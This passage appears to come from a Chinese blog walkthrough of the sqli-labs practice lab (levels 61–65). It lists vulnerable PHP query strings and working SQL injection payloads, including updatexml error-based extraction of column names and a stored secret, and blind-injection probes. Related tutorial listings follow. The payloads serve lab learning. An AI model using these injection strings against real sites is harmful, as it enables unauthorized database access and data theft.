1')) and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='avy2e9297x
')),1)%23
//id,sessid,secret_NSKU,tryy
1')) and updatexml(1,concat(0x23,(select group_concat(secret_NSKU)from challenges.avy2e9297x)),1)%23
//8EhMs3hgKrmAcsmlJn4wVrSh

六十二  盲注
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
1') and length(database())=10 %23
challenges
1') and  ascii(substr((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),1,1))<101%23 

六十三 盲注
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and length(database())=10 %23

六十四 盲注
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
1))  and length(database())=10 %23
  
六十五 盲注
$id = '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
1")  and length(database())=10 %23

通天云计算
关注
专栏目录
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
SQL注入——Less-1-5(学习笔记
xdjxi的博客
02-25 2292
第一关 1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询 2.接着尝试在id后面加上',发现页面回显不正常,表示可能存在SQL字符注入 3.输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符型注入 4.接着使用order by 语句判断,该表中一共有几列数据 order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。5.将id=1改为一个数据库不存在的id值,如861,使用union select 1...
MySQL注入-SQLi-Less1笔记
游离态De猫
07-06 428
MySQL注入-SQLi-Less1
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 3292
sqli-labs靶场之前建议补一下基础。
SQL报错型盲注教程(原理全剖析)
热门推荐
Pz_mstr's Blog
08-21 1万+
深入分析基于报错的sql盲注原理,解密“公式”的奥秘
sqli-labs教程——Less 1-10
Lilin's博客
12-10 1990
sqli-labs教程——Less 1-10 Page-1 Basic ChallengesLess-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)1. 判断是否有注入点2. 判断闭合字符3. 判断当前页面中sql语句的查询列数4. 判断数据在页面中的回显位置和sql语句中回显位5. 判断当前页面连接的数据库名称6. 判断security数据库中的表名称信息7. 判断users表的列名称信息8. 查询users表的所有信息Less
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli注入详解——>sqli-labs less-1~65
qq_51780583的博客
03-18 1176
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
MySQL数据库笔记1
jia1083661的博客
11-21 277
查看服务器中的所有数据库 show databases; 选择某一个数据库操作 在这里插入代码片
SQL报错注入
大博的博客
08-17 271
快草了两个月的bugku-web类型的题,感觉基本web类型都有了一些大概的了解,当然比不上dalao的掌控雷电的操作,后面就是多玩一会python了,毕竟CTF中脚本不会写是真的硬伤。 这道题是web-150分的题,看了一下网上的WP不多,我也是找了一堆资料,看了看相似的体型才把这道题做的差不多。 题名:多次,网址链接 首先打开网页看到id这个参数,很经典的SQL注入。于是测试单引号过滤?...
SQL注入less-1
m0_62903168的博客
05-03 1112
注:phpstudy默认的php版本为7.x,想要成功的搭建靶场,需要把php版本改为5.x。
Sqli-labs之Less-5和Less-6
m0_46315342的博客
06-04 997
      这两关正确的思路是盲注。从源代码中可以看到,运行返回结果正确的时候只返回 you are in....,不会返回数据库当中的信息了(但会print_f(mysql_error()),这点很重要),所以我们不能利用前面 less1-4 的方法。 我们对比...
墨者 - SQL注入漏洞测试(报错盲注)
吃肉唐僧的博客
07-07 2802
根据题意,用updatexml构造报错回显' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ 爆库 ' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ 爆表' and updatexml(1,concat(0x7e,(select table_n...
SQL注入之sqli-labs的Less1~10史上最详细通关教程
qq_49502930的博客
11-14 5487
SQL注入之sqli-labs详细通关教程 首先需要准备好火狐浏览器(方便下载hackbar这个插件)还有phpstudy搭建,以及sqli-labs搭建。其次,我们需要有一定的数据库基本语句基础,通关时有必要的语句我会解释,也希望大家可以自己在网上查找学习相关语句。 下面展示一些 基本语句。 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables w
SQL注入——Less-1(学习笔记
qq_41759633的博客
07-30 670
首先我们需要了解什么是数据库注入以及其原理,我会在后面的文章中更新内容 下面进去sql-less的第一关 字符型注入漏洞 进入页面之后就是这个页面在?id=1后面加上单引号来判断是否存在注入漏洞 但是其页面返回错误那么加上一个注释符–+返回以下页面 可以看到加上注释符后页面返回正常那么接下来我们使用 roder by *来判断该注入漏洞存在字段数 可以看到在测试order by 3返回正常...
sqli-Less1
qq_44060093的博客
04-19 542
最近准备拾起sql注入,sql注入虽然去年就接触学习了,但是没有从原理入手学习,不精通 正好去年又学了数据库,这次颇有温故而知新的意思,温习一些以前掌握的,学习一些以前不知道的。 我用sqli开始学习sql注入,环境的搭建我之前也写过,挺简单的 首先看第一关,应该是没啥过滤,我们主要来学习步骤,流程,以及核心语句 首先发现id=1,可以查数据 再输入一个’ 可能有注入 构造?id=1’ and...
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值